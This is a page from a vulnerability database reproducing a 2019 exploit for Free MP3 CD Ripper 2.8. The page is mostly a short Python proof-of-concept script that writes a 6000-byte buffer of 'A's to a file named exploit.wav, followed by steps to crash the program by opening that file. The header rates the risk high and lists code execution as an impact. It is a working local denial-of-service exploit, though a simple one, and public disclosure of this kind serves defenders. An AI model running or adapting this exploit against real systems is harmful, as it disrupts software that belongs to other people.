Free MP3 CD Ripper 2.8 Buffer Overflow / Denial Of Service

2019.11.25
Credit: Malav Vyas
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#Exploit Title : Free MP3 CD Ripper 2.8 Buffer Overflow (DOS) #Date: 23-08-2019 #Vulnerable Software: FREE MP3 CD RIPPER 2.8 Build 20140611 #Vendor Home Page: www.cleanersoft.com/ #Software Link: www.cleanersoft.com/cd_ripper/free_cd_ripper.html #Tested On: Windows 7 (64Bit) #Attack Type : Denial of Service #Impact : Code Execution #Tested Version - 2.8 #Author - Malav Vyas #Twitter - @malav_vyas1 #Contact - malavvyas98@gmail.com """ Steps to reproduce [1] Run this python file and generate exploit.wav file [2] Open Free Mp3 CD ripper on target and click on convert button [3] select exploit.wav file [4] w00t!! Application should crash, resulting in Denial of service """ #!/usr/bin/python buffer = "A" * 6000 payload = buffer try: f=open("exploit.wav","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top